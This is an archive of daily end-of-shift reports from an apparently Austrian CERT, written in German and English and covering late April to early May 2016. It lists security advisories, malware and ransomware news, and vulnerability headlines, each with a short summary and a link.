*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Sterling Connect:Direct for UNIX (CVE-2015-3194, CVE-2015-3195). *** http://www.ibm.com/support/docview.wss?uid=swg21981765 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM WebSphere Application Server affects IBM Cognos Metrics Manager (CVE-2015-2017) *** http://www.ibm.com/support/docview.wss?uid=swg21976798 --------------------------------------------- *** IBM Security Bulletin: DB2 local escalation of privilege vulnerability affects IBM Tivoli Storage Manager server (CVE-2015-1947) *** http://www.ibm.com/support/docview.wss?uid=swg21979698 --------------------------------------------- *** IBM Security Bulletin: A security vulnerability has been identified in IBM Tivoli / Security Directory Server *** http://www.ibm.com/support/docview.wss?uid=swg21980585 --------------------------------------------- Next End-of-Shift report on 2016-05-06

1 0

Tageszusammenfassung - Dienstag 3-05-2016
by Daily end-of-shift report 03 May '16

03 May '16

======================= = End-of-Shift report = ======================= Timeframe: Montag 02-05-2016 18:00 − Dienstag 03-05-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** GOZNYM MALWARE *** --------------------------------------------- Antivirus software detects GozNym hybrid as Nymaim variant GozNym samples resolve domains, do not connect to IPs returned. Separate IP used for HTTP comms. C2 channel for GozNym appears to be HTTP POST requests, in line with .. --------------------------------------------- https://blog.team-cymru.org/2016/05/goznym-malware/ *** JSA10748 - Protect-RE (loopback) Firewall Filter does not discard OSPF packets from non-permitted prefixes *** --------------------------------------------- http://kb.juniper.net/index?page=content&id=JSA10748&actp=RSS *** Acunetix WVS 10 - Remote command execution (SYSTEM privilege) *** --------------------------------------------- https://cxsecurity.com/issue/WLB-2016050003 *** 3-in-4 Android phones, slabs, gizmos menaced by fresh hijack flaws *** --------------------------------------------- Another month, another round of critical vulnerabilities patched by Google Google has today issued a bundle of 40 security patches for its Android operating system. --------------------------------------------- www.theregister.co.uk/2016/05/02/android_may_patch_batch/ *** Fake Security Conferences *** --------------------------------------------- Turns out there are two different conferences with the title International Conference on Cyber Security (ICCS 2016), one real and one fake. Richard Clayton has the story .. --------------------------------------------- https://www.schneier.com/blog/archives/2016/05/fake_security_c.html *** RSA Data Loss Prevention Bugs Let Remote Users Conduct Cross-Site Scripting and Clickjacking Attacks and Let Remote Authenticated Users Bypass Security Controls and Obtain Potentially Sensitive Information *** --------------------------------------------- http://www.securitytracker.com/id/1035714 *** SNMP Pentesting *** --------------------------------------------- In the previous article about SNMP, we have discussed how to set up your own vulnerable lab where we have configured pfSense and VyOS with SNMP misconfigurations. You can find this article here. In this article, we will discuss how to assess the security .. --------------------------------------------- http://resources.infosecinstitute.com/snmp-pentesting/ *** l+f: Webseite des Ministeriums für digitale Infrastruktur erneut löchrig *** --------------------------------------------- Nach Heartbleed nun XSS: Der Web-Auftritt des Bundesministeriums für Verkehr und digitale Infrastruktur war abermals unzureichend abgesichert. --------------------------------------------- http://heise.de/-3196376 *** OpenSSL Security Advisory [3rd May 2016] *** --------------------------------------------- https://openssl.org/news/secadv/20160503.txt *** OpenSSL schließt Abkömmling der Lucky-13-Lücke *** --------------------------------------------- Die vielgenutzte Krypto-Bibliothek erhält Patches für sechs Sicherheitslücken. Zwei davon haben die Priorität .. --------------------------------------------- http://heise.de/-3196510 *** Ransomware deployments after brute force RDP attack *** --------------------------------------------- Fox-IT has encountered various ways in which ransomware is being spread and activated. Many infections happen by sending spam e-mails and luring the receiver in opening the infected .. --------------------------------------------- https://blog.fox-it.com/2016/05/02/ransomware-deployments-after-brute-force…

1 0

Tageszusammenfassung - Montag 2-05-2016
by Daily end-of-shift report 02 May '16

02 May '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 29-04-2016 18:00 − Montag 02-05-2016 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** DSA-3561 subversion - security update *** --------------------------------------------- Several vulnerabilities were discovered in Subversion, a version controlsystem. The Common Vulnerabilities and Exposures project identifies thefollowing problems: --------------------------------------------- https://www.debian.org/security/2016/dsa-3561 *** Google Patches 9 Security Flaws in New Chrome Browser Build *** --------------------------------------------- Five Chrome bug bounty hunters split $14,000 in rewards as Google patches nine security flaws in its browser, four are labeled 'high'. --------------------------------------------- http://threatpost.com/google-patches-9-security-flaws-in-new-chrome-browser… *** Cloned Websites Stealing Google Rankings *** --------------------------------------------- We often speak of black hat SEO tactics and content scraping sites are just one example of such tactics. Scraping is the act of copying all content from a website using automated scripts, usually with the intention of stealing .. --------------------------------------------- https://blog.sucuri.net/2016/04/cloned-website-stealing-google-rankings-seo… *** Lizard Squad Ransom Threats: New Name, Same Faux Armada Collective M.O. *** --------------------------------------------- [...] Beginning late Thursday evening (Pacific Standard Time) several CloudFlare customers began to receive threatening emails from a "new" group calling itself the 'Lizard Squad'. These emails have a similar modus operandi to the previous ransom emails. This group was threatenin .. --------------------------------------------- https://blog.cloudflare.com/lizard-squad-ransom-threats-new-name-same-faux-… *** Cyber Security Challenge: Wettbewerb für "Nachwuchs-Hacker" startet am 2. Mai *** --------------------------------------------- Ab sofort sind Schüler und Studenten wieder aufgerufen, sich den Online-Prüfungen der Cyber Security Challenge zu stellen. Die Qualifikationsphase läuft bis zum 1. August, das deutsche Finale findet Ende September in Berlin statt. --------------------------------------------- http://heise.de/-3194493 *** Crypto-ransomware Gains Footing in Corporate Grounds, Gets Nastier for End Users *** --------------------------------------------- In the first four months of 2016, we have discovered new families and variants of ransomware, seen their vicious new routines, and witnessed threat actors behind these operations upping the ransomware game to new heights. All these developments further establish crypto-ransomware as a .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/crypto-ransomwar… *** Schwarzmarkt: Preis für mobile Malware zieht an *** --------------------------------------------- Sicherheitsforschern zufolge floriert der Handel mit mobiler Malware. Der Anbieter des Android-Trojaners GM Bot zieht indes die Preise auf Malware-Marktplätzen spürbar an. --------------------------------------------- http://heise.de/-3195382 *** Practical Reverse Engineering Part 2 - Scouting the Firmware *** --------------------------------------------- In part 1 we found a debug UART port that gave us access to a linux shell. At this point we've got the same access to the router that a developer would use to debug issues, control the system, etc. --------------------------------------------- http://jcjc-dev.com/2016/04/29/reversing-huawei-router-2-scouting-firmware/ *** Ernste Sicherheitslücke in Ubuntus neuem Paketformat Snap geschlossen *** --------------------------------------------- Ubuntus neues Paketformat Snap sorgt erneut für Aufsehen: Nun haben die Entwickler einen Schreibfehler im Code entfernt, der Angreifern das Ausführen von beliebigem Schadcode ermöglicht hatte. --------------------------------------------- http://heise.de/-3195532

1 0

Tageszusammenfassung - Freitag 29-04-2016
by Daily end-of-shift report 29 Apr '16

29 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 28-04-2016 18:00 − Freitag 29-04-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** A Dramatic Rise in ATM Skimming Attacks *** --------------------------------------------- Skimming attacks on ATMs increased at an alarming rate last year for both American and European banks and their customers, according to recent stats collected by fraud trackers. The trend appears to be continuing into 2016, with outbreaks of skimming activity visiting a much broader swath of the United States than in years past. --------------------------------------------- http://krebsonsecurity.com/2016/04/a-dramatic-rise-in-atm-skimming-attacks/ *** Security: Der Internetminister hat Heartbleed *** --------------------------------------------- Die Webseite des Bundesministeriums für Verkehr und digitale Infrastruktur war für eine seit fast zwei Jahren geschlossene, kritische Sicherheitslücke anfällig. Das kompromittierte Zertifikat wird weiterhin verwendet. (Heartbleed, Verschlüsselung) --------------------------------------------- http://www.golem.de/news/security-der-internetminister-hat-heartbleed-1604-… *** Zahlreiche Zugangsdaten für den Messaging-Dienst Slack auf GitHub entdeckt *** --------------------------------------------- Die Sicherheitsfirma Detectify hat über tausend Zugangs-Tokens für Slack in öffentlich zugänglichen GitHub-Repositories gefunden. --------------------------------------------- http://heise.de/-3194000 *** eBay-Phisher gehen mit persönlichen Details auf Opferfang *** --------------------------------------------- Derzeit sind besonders perfide Phishing-Mails im Namen von eBay unterwegs. In den Nachrichten werden die Empfänger mit komplettem Namen und vollständiger Anschrift angesprochen. --------------------------------------------- http://heise.de/-3194026 *** Got ransomware? These tools may help *** --------------------------------------------- Your computer has been infected by ransomware. All those files -- personal documents, images, videos, and audio files -- are locked up and out of your reach.There may be a way to get those files back without paying a ransom. But first a couple of basic questions:Do you you have complete backups? If so, recovery is simply a matter of wiping the machine -- bye bye, ransomware! -- reinstalling your applications, and restoring the data files. Its a little stressful, but doable.Are they good... --------------------------------------------- http://www.cio.com/article/3063048/security/got-ransomware-these-tools-may-… *** Sysinternals Updated today - Updates to Sysmon, Procdump and Sigcheck. (Fri, Apr 29th) *** --------------------------------------------- https://isc.sans.edu/diary.html?storyid=21001 https://blogs.technet.microsoft.com/sysinternals/2016/04/28/update-sysmon-v… *** BIND 9.9.9/9.10.4 released *** --------------------------------------------- https://lists.isc.org/pipermail/bind-announce/2016-April/000986.html https://lists.isc.org/pipermail/bind-announce/2016-April/000987.html https://lists.isc.org/pipermail/bind-announce/2016-April/thread.html *** DFN-CERT-2016-0686: Jenkins: Zwei Schwachstellen ermöglichen u.a. das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0686/ *** [HTB23301]: SQL Injection in GLPI *** --------------------------------------------- Product: GLPI v0.90.2Vulnerability Type: SQL Injection [CWE-89]Risk level: High Creater: INDEPNET Advisory Publication: April 8, 2016 [without technical details]Public Disclosure: April 29, 2016 CVE Reference: Pending CVSSv2 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L] Vulnerability Details: High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in a popular Information Resource Manager (IRM) system GLPI. IRM systems are usually used for... --------------------------------------------- https://www.htbridge.com/advisory/HTB23301 *** Bugtraq: [security bulletin] HPSBUX03583 SSRT110084 rev.1 - HP-UX BIND Service running Named, Remote Denial of Service (DoS) *** --------------------------------------------- http://www.securityfocus.com/archive/1/538219 *** Cisco Information Server XML Parser Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** APPLE-SA-2016-04-28-1 OS X: Flash Player plug-in blocked *** --------------------------------------------- APPLE-SA-2016-04-28-1 OS X: Flash Player plug-in blockedDue to security and stability issues in older versions, Applehas updated the web plug-in blocking mechanism to disable allversions prior to Flash Player 21.0.0.226 and 18.0.0.343.Information on blocked web plug-ins will be posted to: [...] --------------------------------------------- http://prod.lists.apple.com/archives/security-announce/2016/Apr/msg00000.ht… *** Moxa NPort Device Vulnerabilities (Update B) *** --------------------------------------------- This alert update is a follow-up to the NCCIC/ICS-CERT updated alert titled ICS-ALERT-16-099-01A Moxa NPort Device Vulnerabilities that was published April 20, 2016, on the ICS-CERT web page. ICS-CERT is aware of a public report of vulnerabilities affecting multiple models of the Moxa NPort device. These vulnerabilities were reported by Reid Wightman of Digital Bonds Labs, who coordinated with the vendor but not with ICS-CERT. --------------------------------------------- https://ics-cert.us-cert.gov/alerts/ICS-ALERT-16-099-01 *** SSA-763427 (Last Update 2016-04-29): Vulnerability in Communication Processor (CP) modules SIMATIC CP 343-1, TIM 3V-IE, TIM 4R-IE, and CP 443-1 *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-763427… *** SSA-921524 (Last Update 2016-04-29): Incorrect Frame Padding in ROS-based Devices *** --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-921524… *** IBM Security Bulletin: Multiple vulnerabilities in current releases of IBM® WebSphere Real Time *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21982198 *** IBM Security Bulletin: A vulnerability in IBM WebSphere Application Server affects IBM QuickFile (CVE-2015-2017). *** --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg21977561 *** Bugtraq: [SECURITY] [DSA 3561-1] subversion security update *** --------------------------------------------- http://www.securityfocus.com/archive/1/538223 *** WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8473 *** WordPress <= 4.4.2 - Reflected XSS in Network Settings *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8474 *** WordPress <= 4.4.2 - Script Compression Option CSRF *** --------------------------------------------- https://wpvulndb.com/vulnerabilities/8475

1 0

Tageszusammenfassung - Donnerstag 28-04-2016
by Daily end-of-shift report 28 Apr '16

28 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 27-04-2016 18:00 − Donnerstag 28-04-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Malware Takes Advantage of Windows "God Mode" *** --------------------------------------------- Microsoft Windows has hidden an Easter Egg since Windows Vista. It allows users to create a specially named folder that acts as a shortcut to Windows settings and special folders, such as control panels, My Computer, or the printers folder. This "God Mode" can come in handy for admins, but attackers are now using this undocumented feature for evil ends. Files placed within one of these master control panel shortcuts are not easily accessible via Windows Explorer because the folders do... --------------------------------------------- https://blogs.mcafee.com/mcafee-labs/malware-takes-advantage-of-windows-god… *** VB2016 Call for Papers Deadline *** --------------------------------------------- You have until the early hours (GMT) of Monday 21 March to submit an abstract for VB2016! The VB2016 programme will be announced in the first week of April. --------------------------------------------- https://www.virusbulletin.com/blog/2016/03/vb2016-call-papers-deadline/ *** How broken is SHA-1 really? *** --------------------------------------------- SHA-1 collisions may be found in the next few months, but that doesnt mean that fake SHA-1-based certificates will be created in the near future. Nevertheless, it is time for everyone, and those working in security in particular, to move away from outdated hash functions. --------------------------------------------- https://www.virusbulletin.com/blog/2016/03/how-broken-sha-1-really/ *** Firefox 46 Patches Critical Memory Vulnerabilities *** --------------------------------------------- Mozilla released Firefox 46, which includes patches for one critical and four high-severity vulnerabilities, all of which can lead to remote code execution. --------------------------------------------- http://threatpost.com/firefox-46-patches-critical-memory-vulnerabilities/11… *** DNS and DHCP Recon using Powershell, (Thu, Apr 28th) *** --------------------------------------------- I recently had a client pose an interesting problem. They wanted to move all their thin clients to a separate VLAN. In order to do that, I needed to identify which switch port each was on. Since there were several device vendors involved, I couldnt use OUI portion of the MAC. Fortunately, they were using only a few patterns in their thin client hostnames, so that gives me an in. Great you say, use nmap -sn, sweep for the names, get the MAC addresses and map those to switch ports - easy right? --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20995&rss *** Time for a patch: six vulns fixed in NTP daemon *** --------------------------------------------- Whats the time? Its time to get ill. Unless you fix these beastly flaws Cisco has turned over a bunch of Network Time Protocol daemon (ntpd) vulnerabilities to the Linux Foundations Core Infrastructure Initiative. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/04/28/time_for_a_… *** Handling security bugs, vulnerable infrastructure and a range of DDoS attacks: 22nd MELANI semi-annual report *** --------------------------------------------- In the second half of 2015, there were once again some spectacular cyber-related incidents worldwide. These were primarily DDoS attacks, phishing attacks and attacks on industrial control systems. Published today, the 22nd MELANI semi-annual report features handling security vulnerabilities as its key topic. --------------------------------------------- https://www.melani.admin.ch/melani/en/home/dokumentation/newsletter/semi-an… *** Binary Webshell Through OPcache in PHP 7 *** --------------------------------------------- In this article, we will be looking at a new exploitation technique using the default OPcache engine from PHP 7. Using this attack vector, we can bypass certain hardening techniques that disallow the file write access in the web directory. This could be used by an attacker to execute his own malicious code in a hardened environment. --------------------------------------------- http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ *** Kaspersky DDoS Intelligence Report for Q1 2016 *** --------------------------------------------- In Q1, resources in 74 countries were targeted by DDoS attacks. China, the US and South Korea remained the leaders in terms of number of DDoS attacks and number of targets. The longest DDoS attack in Q1 2016 lasted for 197 hours (or 8.2 days). --------------------------------------------- http://securelist.com/analysis/quarterly-malware-reports/74550/kaspersky-dd… *** Cyber Security Lecture given by Mozilla *** --------------------------------------------- May 09, 2016 - 4:00 pm - 6:30 pm TU Wien Karlsplatz 13 1040 Wien Let’s Encrypt (J.C. Jones) You can’t build a secure website without having a certificate, and getting a certificate is one of the hardest parts of setting up a secure website. Mozilla helped start up Let’s Encrypt to make getting a certificate easier and promote the security of the Web. In 16 months, Let’s Encrypt went from an idea... Mozilla Security (Richard Barnes) The Web is arguably the single largest platform for applications in the world. Securing a Web browser requires security expertise from across the field, including low-level program internals, network security, language design, and access controls. In this talk, we will discuss some of the critical Web... --------------------------------------------- https://www.sba-research.org/events/cyber-security-lecture-given-by-mozilla/ *** PCI DSS 3.2 is out: What's new? *** --------------------------------------------- The Payment Card Industry Security Standards Council has published the latest version of PCI DSS, the information security standard for organizations that handle customer credit cards. Changes and improvements in PCI DSS 3.2 include: Multi-factor authentication will be required for all administrative access into the cardholder data environment. Previously, use of multi-factor authentication was only a must when it was accessed remotely, by an untrusted user/device. This will not impact... --------------------------------------------- https://www.helpnetsecurity.com/2016/04/28/pci-dss-3-2-whats-new/ *** Cisco Finds Backdoor Installed on 12 Million PCs *** --------------------------------------------- UPDATED. Cisco's Talos security intelligence and research group has come across a piece of software that installed backdoors on 12 million computers around the world. --------------------------------------------- http://www.securityweek.com/cisco-finds-backdoor-installed-12-million-pcs *** Forthcoming OpenSSL releases *** --------------------------------------------- The OpenSSL project team would like to announce the forthcoming release of OpenSSL versions 1.0.2h, 1.0.1t. These releases will be made available on 3rd May 2016 between approximately 1200-1500 UTC. They will fix several security defects with maximum severity "high". --------------------------------------------- https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html *** VMSA-2015-0007.4 *** --------------------------------------------- VMware vCenter and ESXi updates address critical security issues. --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2015-0007.html *** Bugtraq: CVE-2015-5207 - Bypass of Access Restrictions in Apache Cordova iOS *** --------------------------------------------- http://www.securityfocus.com/archive/1/538213 *** sol93532943: SSHD session.c vulnerability CVE-2016-3115 *** --------------------------------------------- Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions. (CVE-2016-3115) --------------------------------------------- https://support.f5.com/kb/en-us/solutions/public/k/93/sol93532943.html?ref=… *** sol52349521: OpenSSL vulnerability CVE-2016-2842 *** --------------------------------------------- The doapr_outch function in crypto/bio/b_print.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g does not verify that a certain memory allocation succeeds, which allows remote attackers to cause a denial of service (out-of-bounds write or memory consumption) or possibly have unspecified other impact via a long string, as demonstrated by a large amount of ASN.1 data, a different vulnerability than CVE-2016-0799. (CVE-2016-2842) --------------------------------------------- https://support.f5.com/kb/en-us/solutions/public/k/52/sol52349521.html?ref=… *** Cisco Security Advisories *** --------------------------------------------- *** Cisco Application Policy Infrastructure Controller Enterprise Module Unauthorized Access Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco WebEx Meetings Server Open Redirect Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Multiple Vulnerabilities in Network Time Protocol Daemon Affecting Cisco Products: April 2016 *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in Samba - including Badlock - Transformation Extender Hypervisor Edition *** http://www.ibm.com/support/docview.wss?uid=swg21981057 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in Samba including Badlock - affect IBM OS Images for Red Hat Linux Systems. *** http://www.ibm.com/support/docview.wss?uid=swg21982097 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in Samba, including Badlock, affect IBM i *** http://www.ibm.com/support/docview.wss?uid=nas8N1021296 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in php5 affect IBM Flex System Manager (FSM) (CVE-2015-6836, CVE-2015-6837, CVE-2015-6838) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023641 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in ISC BIND and Samba - including Badlock - affect IBM Netezza Host Management *** http://www.ibm.com/support/docview.wss?uid=swg21979985 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilitiesin gnutls affect IBM Flex System Manager(FSM) (CVE-2015-2806, CVE-2015-8313) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023642 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in openLDAP affects IBM Flex System Manager(FSM) (CVE-2015-6908) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023640 --------------------------------------------- *** IBM Security Bulletin: Potential security vulnerability in IBM WebSphere Application Server for Bluemix if FIPS 140-2 is enabled (CVE-2016-0306) and multiple vulnerabilities in Samba - including Badlock (CVE-2016-2118) *** http://www.ibm.com/support/docview.wss?uid=swg21982128 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in OpenSSL affect IBM Rational Application Developer for WebSphere Software included in Rational Developer for i and Rational Developer for AIX and Linux *** http://www.ibm.com/support/docview.wss?uid=swg21981752 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Edition *** http://www.ibm.com/support/docview.wss?uid=swg21980826 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities exist with Oracle Outside In Technology (OIT) in IBM FileNet Content Manager and IBM Content Foundation. *** http://www.ibm.com/support/docview.wss?uid=swg21975822 --------------------------------------------- *** IBM Security Bulletin: Multiple Vulnerabilities in IBM SDK, Java Technology Edition Quarterly CPU - Jan 2016 - Includes Oracle Jan 2016 CPU + 3 IBM CVEs affects IBM Algorithmics One Core, Algo Risk Application, and Counterparty Credit Risk *** http://www.ibm.com/support/docview.wss?uid=swg21981333 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in SQLite affects IBM Security Access Manager for Web (CVE-2015-3416) *** http://www.ibm.com/support/docview.wss?uid=swg21981270 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in RSOC_APP_01 Frameable Response Potential Clickjacking (CSRF) affects IBM Algorithmics Algo Risk Application - CVE-2016-0207 *** http://www.ibm.com/support/docview.wss?uid=swg21981322 ---------------------------------------------

1 0

Tageszusammenfassung - Mittwoch 27-04-2016
by Daily end-of-shift report 27 Apr '16

27 Apr '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 26-04-2016 18:00 − Mittwoch 27-04-2016 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Nationale Strategie: De Maizière will Wirtschaft besser gegen Cyberspionage schützen *** --------------------------------------------- Manchmal ist es eine komplexer Hackerangriff, manchmal fängt sich der Chef die Schadsoftware auch direkt von der Speisekarte seines Lieblingsrestaurants ein. Vielen Unternehmen fehlt noch das Bewusstsein der Gefahr. Das soll anders werden. --------------------------------------------- http://heise.de/-3189372 *** All About Fraud: How Crooks Get the CVV *** --------------------------------------------- A longtime reader recently asked: "How do online fraudsters get the 3-digit card verification value (CVV or CVV2) code printed on the back of customer cards if merchants are forbidden from storing this information? The answer: Probably by installing a Web-based keylogger at an online merchant so that all data that customers submit to the site is copied and sent to the attackers server. --------------------------------------------- http://krebsonsecurity.com/2016/04/all-about-fraud-how-crooks-get-the-cvv/ *** A Look Inside Cerber Ransomware *** --------------------------------------------- The "Cerber" family of ransomware first appeared in open source reporting in March 2016, with victims readily identified by the ".cerber" extension left on encrypted files. Unlike many other ransomware variants, Cerber is designed to encrypt a victim's file system immediately, without receiving "confirmation" or instructions from a command and control (C2) node. After this malicious encryption is complete, HTML and text files are opened on the infected... --------------------------------------------- https://blog.team-cymru.org/2016/04/a-look-inside-cerber-ransomware/ *** Malvertising On The Pirate Bay Drops Ransomware *** --------------------------------------------- Magnitude EK strikes again, this time on The Pirate Bay, and drops the Cerber Ransomware. Categories: ExploitsTags: cerbermagnitude EKransomwareThe Pirate BayTPB(Read more...) --------------------------------------------- https://blog.malwarebytes.org/threat-analysis/exploits-threat-analysis/2016… *** Next up. A look at Locky Ransomware *** --------------------------------------------- Weve been examining some of the newer - or, at least, most currently prevalent - strains of ransomware. This time we look at Locky. --------------------------------------------- http://www.scmagazine.com/next-up-a-look-at-locky-ransomware/article/492355/ *** 7ev3n ransomware alters name, asks for much lower ransom *** --------------------------------------------- A variant of 7ev3n ransomware has modified its name and begun asking victims for a considerably lower ransom fee than it was seeking just a few months ago. Security researchers originally detected the 7ev3n ransomware back in January of this year. --------------------------------------------- https://www.grahamcluley.com/2016/04/7ev3n-ransomware-alters-asks-lower-ran… *** BSI-Umfrage: Ein Drittel der Unternehmen ist von Erpressungs-Trojanern betroffen *** --------------------------------------------- Den Ergebnissen einer Ransomware-Umfrage des BSI zufolge schützen 60 Prozent der befragten Institutionen aus der deutschen Wirtschaft die Lage als verschärft ein. Auch die Security Bilanz Deutschland vermeldet einen erhöhten Bedrohungsgrad. --------------------------------------------- http://heise.de/-3189776 *** "Ransomware ist mittlerweile die größte Bedrohung" *** --------------------------------------------- Trojaner, die Systeme verschlüsseln, bieten Kriminellen einen einfachen Weg, Geld zu verdienen. Die Opferzahlen steigen und auch Smartphones sind nicht mehr sicher. --------------------------------------------- http://futurezone.at/digital-life/ransomware-ist-mittlerweile-die-groesste-… *** Digging deep for PLATINUM *** --------------------------------------------- There is no shortage of headlines about cybercriminals launching large-scale attacks against organizations. For us, the activity groups that pose the most danger are the ones who selectively target organizations and desire to stay undetected, protect their investment, and maximize their ROI. That's what motivated us - the Windows Defender Advanced Threat Hunting team, known... --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platin… *** Boffins believe buggy Binder embiggens Android attack surface *** --------------------------------------------- Punching holes in problematic private APIs Bugs in Androids Binder inter-process communication (IPC) mechanism open up a mass of security bugs, according to University of Michigan boffins Huan Feng and Kang Shin. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/04/27/boffins_bel… *** Memory Forensics *** --------------------------------------------- Introduction This mini-course started with forensic memory basics, in this mini-course, we have explained how you can and what you can find artifacts from memory. As Memory forensics is very vast topic so we have also explained some memory basic such as how memory works what memory architecture and its unit is. Also, what artifacts... --------------------------------------------- http://resources.infosecinstitute.com/memory-forensics/ *** An Introduction to Mac memory forensics, (Tue, Apr 26th) *** --------------------------------------------- Unfortunately when its come to the memory forensics Mac in environment doesnt have the luxury that we have in the Windows environment. The first step of the memory forensics is capturing the memory, while in Windows we have many tools to achieve this, in Mac we have very few options. OSXPmem is the only available option for memory capturing that support El Capitan, https://github.com/google/rekall/releases/download/v1.3.2/osxpmem_2.0.1.zip Now let"> cd osxpmem.app/ "> chown --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20989&rss *** How to Suck at Information Security - A Cheat Sheet *** --------------------------------------------- This cheat sheet presents common information security mistakes, so you can avoid making them. Yeah, the idea is that you should do the opposite of what it says below. To print, use the one-sheet PDF version; you can also edit the Word version for you own needs. --------------------------------------------- https://zeltser.com/suck-at-security-cheat-sheet/ *** [DSA 3558-1] openjdk-7 security update *** --------------------------------------------- CVE ID: CVE-2016-0636 CVE-2016-0686 CVE-2016-0687 CVE-2016-0695 CVE-2016-3425 CVE-2016-3426 CVE-2016-3427 Several vulnerabilities have been discovered in OpenJDK, an implementation of the Oracle Java platform, resulting in breakouts of the Java sandbox, denial of service or information disclosure. --------------------------------------------- https://lists.debian.org/debian-security-announce/2016/msg00134.html *** VTS16-001: NetBackup Remote Access Vulnerabilities *** --------------------------------------------- Multiple vulnerabilities have been identified in Veritas (formerly Symantec) NetBackup Master/ Media Servers and clients. An attacker, able to successfully access a vulnerable NetBackup host, could potentially execute arbitrary commands or operations resulting in possible unauthorized, privileged access to the targeted system. --------------------------------------------- https://www.veritas.com/content/support/en_US/security/VTS16-001.html *** F5 Security Advisory: glibc calloc vulnerability CVE-2015-5229 *** --------------------------------------------- https://support.f5.com:443/kb/en-us/solutions/public/k/23/sol23822215.html?… *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java SDK affect IBM Tivoli Monitoring (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976066 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM SDK, Java Technology Editionaffects IBM Algorithmics Algo Risk Application and Algo One Core ( CVE-2015-4872, CVE-2015-4911, CVE-2015-4893, CVE-2015-4803, *** http://www.ibm.com/support/docview.wss?uid=swg21981349 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Tivoli Provisioning Manager (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21981826 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli Monitoring (CVE-2015-2601,CVE-2015-4749.CVE-2015-2625,CVE-2015-1931 ) *** http://www.ibm.com/support/docview.wss?uid=swg21976560 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in HTTP Response Splitting affects IBM Algorithmics Algo Risk Application & AlgoOne Core- CVE-2015-2017 *** http://www.ibm.com/support/docview.wss?uid=swg21981532 ---------------------------------------------

1 0

Tageszusammenfassung - Dienstag 26-04-2016
by Daily end-of-shift report 26 Apr '16

26 Apr '16

